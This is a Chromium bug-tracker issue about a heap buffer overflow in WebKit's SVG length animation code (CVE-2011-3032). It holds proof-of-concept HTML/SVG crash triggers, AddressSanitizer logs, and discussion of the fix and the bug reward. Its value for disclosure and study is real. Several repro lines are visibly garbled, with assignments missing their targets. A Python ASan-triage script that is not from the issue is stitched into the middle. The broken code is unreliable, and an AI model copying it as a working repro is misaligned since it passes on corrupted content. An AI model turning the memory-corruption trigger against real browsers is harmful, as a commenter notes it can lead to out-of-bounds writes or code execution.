
Issue 108037


Issue metadata

Status: Fixed
Closed: Feb 2012
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security


Heap-buffer-overflow in WebCore::SVGLength::valueAsString

Reported by, Dec 19 2011

Issue description

Heap buffer overflow can be triggered while building SVG animated element length.

18.0.974.0 (Developer Build 114913 Linux)
Crashes also on Windows 7, 16.0.912.63 m, but not under debugger.
Can't crash under Linux 16.0.912.63, its behavior is weird - doesn't load second time. However, first crash was caught in this version.

            function go() {
                c = 0;
                q = document.getElementById('root').contentDocument;
                s = q.getElementById('s');
                a = q.getElementById('a');
                    function crash() {
                        if (c==0) = 'x';
                        if (c==1) s.appendChild( a.cloneNode(0) );
                        if (c==2) setTimeout("'b'", 1);
                    }, 1
        <object data="f.svg" id="root" onload="go()"/></object>

--- f.svg ---

<svg id="s" xmlns="" xmlns:xlink="">
<text id="x"></text>
<animate xlink:href="#x" id="a" attributeName="y" from="1" to="2" dur="1s"/>

==32190== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f19005e1400 at pc 0x7f1939a4e2d5 bp 0x7fff62d57750 sp 0x7fff62d57748
READ of size 4 at 0x7f19005e1400 thread T0
    #0 0x7f1939a4e2d5 in WebCore::SVGLength::valueAsString() const /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/SVGLength.cpp:252
    #1 0x7f1939b40568 in WebCore::SVGLengthList::valueAsString() const /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/SVGLengthList.cpp:66
    #2 0x7f1939b3c7a5 in WebCore::SVGAnimatedType::valueAsString() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/SVGAnimatedType.cpp:312
    #3 0x7f19399d2ee5 in WebCore::SVGAnimateElement::applyResultsToTarget() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/SVGAnimateElement.cpp:233
    #4 0x7f1939accadf in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, double, WTF::String const&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/animation/SMILTimeContainer.cpp:297
    #5 0x7f1939acb918 in ~RefPtr /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/RefPtr.h:58
    #6 0x7f193899235a in WebCore::ThreadTimers::sharedTimerFiredInternal() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/platform/ThreadTimers.cpp:118
0x7f19005e1400 is located 0 bytes to the right of 128-byte region [0x7f19005e1380,0x7f19005e1400)
allocated by thread T0 here:
    #0 0x7f193b174414 in malloc ??:0
    #1 0x7f193838db66 in WTF::fastMalloc(unsigned long) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/FastMalloc.cpp:268
    #2 0x7f1938d3b189 in WTF::Vector<WebCore::SVGLength, 0ul>::expandCapacity(unsigned long, WebCore::SVGLength const*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/Vector.h:786
    #3 0x7f19399dec25 in WebCore::SVGAnimationElement::updateAnimation(float, unsigned int, WebCore::SVGSMILElement*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/SVGAnimationElement.cpp:624
    #4 0x7f1939adc8d2 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/animation/SVGSMILElement.cpp:947
    #5 0x7f1939acc782 in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, double, WTF::String const&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/animation/SMILTimeContainer.cpp:277
    #6 0x7f1939acb918 in ~RefPtr /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/RefPtr.h:58
    #7 0x7f193899235a in WebCore::ThreadTimers::sharedTimerFiredInternal() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/platform/ThreadTimers.cpp:118
==32190== ABORTING
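An added example, not code from the issue or from WebKit: a small triage parser for the AddressSanitizer report above. It pulls out the access kind and size, the faulting frame, how far the access lands past the 128-byte region, and the first non-allocator frame that grew the buffer, and cross-checks ASan's "located N bytes to the right of" sentence against the hex addresses it printed. The sample input is a trimmed copy of the report quoted in this issue.

```python
import re

# Constructed sample: a trimmed copy of the ASan report quoted in this issue.
ASAN_REPORT = """\
==32190== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f19005e1400 at pc 0x7f1939a4e2d5 bp 0x7fff62d57750 sp 0x7fff62d57748
READ of size 4 at 0x7f19005e1400 thread T0
    #0 0x7f1939a4e2d5 in WebCore::SVGLength::valueAsString() const /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/SVGLength.cpp:252
    #1 0x7f1939b40568 in WebCore::SVGLengthList::valueAsString() const /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/svg/SVGLengthList.cpp:66
0x7f19005e1400 is located 0 bytes to the right of 128-byte region [0x7f19005e1380,0x7f19005e1400)
allocated by thread T0 here:
    #0 0x7f193b174414 in malloc ??:0
    #1 0x7f193838db66 in WTF::fastMalloc(unsigned long) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/FastMalloc.cpp:268
    #2 0x7f1938d3b189 in WTF::Vector<WebCore::SVGLength, 0ul>::expandCapacity(unsigned long, WebCore::SVGLength const*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/Vector.h:786
==32190== ABORTING
"""

ERROR_RE = re.compile(r"ERROR: AddressSanitizer (?P<kind>[\w-]+) on address (?P<addr>0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(?P<op>READ|WRITE) of size (?P<size>\d+) at 0x[0-9a-f]+ thread (?P<thread>T\d+)", re.M)
# A frame line: "#N 0xADDR in <function, may contain spaces> <file:line or ??:0>".
FRAME_RE = re.compile(r"^\s+#(?P<n>\d+) 0x[0-9a-f]+ in (?P<func>.+?) (?P<loc>\S+)$", re.M)
REGION_RE = re.compile(r"is located (?P<off>\d+) bytes to the (?P<side>left|right) of "
                       r"(?P<size>\d+)-byte region \[(?P<lo>0x[0-9a-f]+),(?P<hi>0x[0-9a-f]+)\)")


def triage(report: str) -> dict:
    """Summarise an ASan heap-buffer-overflow report and verify it is self-consistent."""
    head, _, alloc = report.partition("allocated by thread")
    err, acc, reg = ERROR_RE.search(head), ACCESS_RE.search(head), REGION_RE.search(head)
    if not (err and acc and reg):
        raise ValueError("not a complete ASan heap-buffer-overflow report")
    crash_frames = [(m["func"], m["loc"]) for m in FRAME_RE.finditer(head)]
    alloc_frames = [(m["func"], m["loc"]) for m in FRAME_RE.finditer(alloc)]
    addr, lo, hi = (int(x, 16) for x in (err["addr"], reg["lo"], reg["hi"]))
    # Recompute the overshoot from the raw addresses and compare with ASan's own sentence.
    overshoot = addr - hi if reg["side"] == "right" else lo - addr
    consistent = (hi - lo == int(reg["size"])) and overshoot == int(reg["off"])
    # Skip the allocator frames (malloc / fastMalloc) to reach the code that owns the buffer.
    owner = next((f for f in alloc_frames if "alloc" not in f[0].lower()), None)
    return {
        "kind": err["kind"], "access": acc["op"], "size": int(acc["size"]),
        "thread": acc["thread"], "frame": crash_frames[0] if crash_frames else None,
        "region_bytes": hi - lo, "overshoot": overshoot, "side": reg["side"],
        "owner": owner, "consistent": consistent,
    }
```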


Comment 1 by, Dec 19 2011

Status: Assigned
Summary: Heap-buffer-overflow in WebCore::SVGLength::valueAsString
Detailed report:


Crash Type: Heap-buffer-overflow READ 4
Crash Address: 0x7fd4218a6900
Crash State:
  - crash stack -

Minimized Testcase (0.57 Kb):
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecSeverity-Medium OS-All Mstone-16 SecImpacts-Stable SecImpacts-Beta Stability-AddressSanitizer
From the ASAN log:
==24989== ERROR: AddressSanitizer crashed on unknown address 0x0000bbadbeef (pc 0x7fb6be616941 sp 0x7fb67a8f0740 bp 0x7fb67a8f0a90 ax 0x0000bbadbeef T15)

Isn't 0xbbadbeef a WebKit ASSERT? I wonder what it does in a release ASAN build?
Chris, the report has both release and debug build stacks (release stack after the debug stack). On debug, it crashes on the assert and on release, it crashes on heap-buffer-overflow.
Oh, well isn't that just epic :)

Comment 7 by, Dec 19 2011

Yeah. It's misinterpreting a user-supplied numeric value as a length value. So, very bad--probably high severity but I have to verify that a write or call is possible after the read. Shouldn't be a difficult fix, but I have to figure out where it goes.

Comment 8 by, Dec 20 2011

Still trying to figure out the right spot to catch this, but here's a simpler (single file) repro:

<svg id="s">
  <text id="x"></text>
  <animate xlink:href="#x" id="a" attributeName="y" from="0" to="1" dur="1s" repeatCount="indefinite">
setTimeout(function() {
    s = document.getElementById('s') = 'x'
    setTimeout(function () {'b' }, 0)
}, 0)

Comment 9 by, Dec 21 2011

Adam, please try the repro from comment #8. You may need to wait 10 seconds and reload.
Labels: -SecSeverity-Medium SecSeverity-High WEBKIT-ID-75096 reward-topanel
Reported upstream:

I'll be uploading a patch shortly, and I've upped the severity because you can turn it into an OOB write/execute.
Labels: -Mstone-16 Mstone-17
The last M16 patch is already gone. Mass-updating all of these to M17.
Labels: WebKit-SVG
Could someone please add me (schenney ... to the WebKit bug so I can see it and track progress and nudge reviewers if needed.
Thanks for grabbing this. I'm heads down on the Flash sandbox right now and haven't had time to circle back to it.

To add some context, Niko's suggestion upstream about where to move the checks is a bad idea. However, the patch I submitted probably wasn't entirely right either. It catches the bad animate element before use, but you can probably do better by preventing the bad animate from getting created when the node is cloned.
Status: Started
Status: Fixed
Committed WebKit r108134: <>

Security team will need to merge this into earlier branches as I do not have committer status yet.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
Labels: -Merge-Approved Merge-Merged
Labels: -reward-topanel reward-1000 reward-unpaid
@Ax330d: I'm sure you're not surprised about $1000 :)

Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
Labels: CVE-2011-3032
Labels: -reward-unpaid

Comment 25 by, May 15 2012

Status: Fixed
Marking old security bugs Fixed.
Project Member

Comment 26 by, Oct 13 2012

Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member

Comment 27 by, Mar 10 2013

Labels: -Type-Security -Area-WebKit -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer -Mstone-17 -WebKit-SVG Cr-Content Cr-Content-SVG Security-Impact-Stable Security-Impact-Beta Security-Severity-High Type-Bug-Security M-17 Performance-Memory-AddressSanitizer
Project Member

Comment 28 by, Mar 13 2013

Labels: Restrict-View-EditIssue
Project Member

Comment 29 by, Mar 13 2013

Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member

Comment 31 by, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High
Project Member

Comment 32 by, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 33 by, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member

Comment 34 by, Apr 1 2013

Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member

Comment 35 by, Apr 6 2013

Labels: -Cr-Content Cr-Blink
Project Member

Comment 36 by, Apr 6 2013

Labels: -Cr-Content-SVG Cr-Blink-SVG
Project Member

Comment 37 by, Jun 14 2016

Labels: -security_impact-beta
Project Member

Comment 38 by, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot
Project Member

Comment 39 by, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted
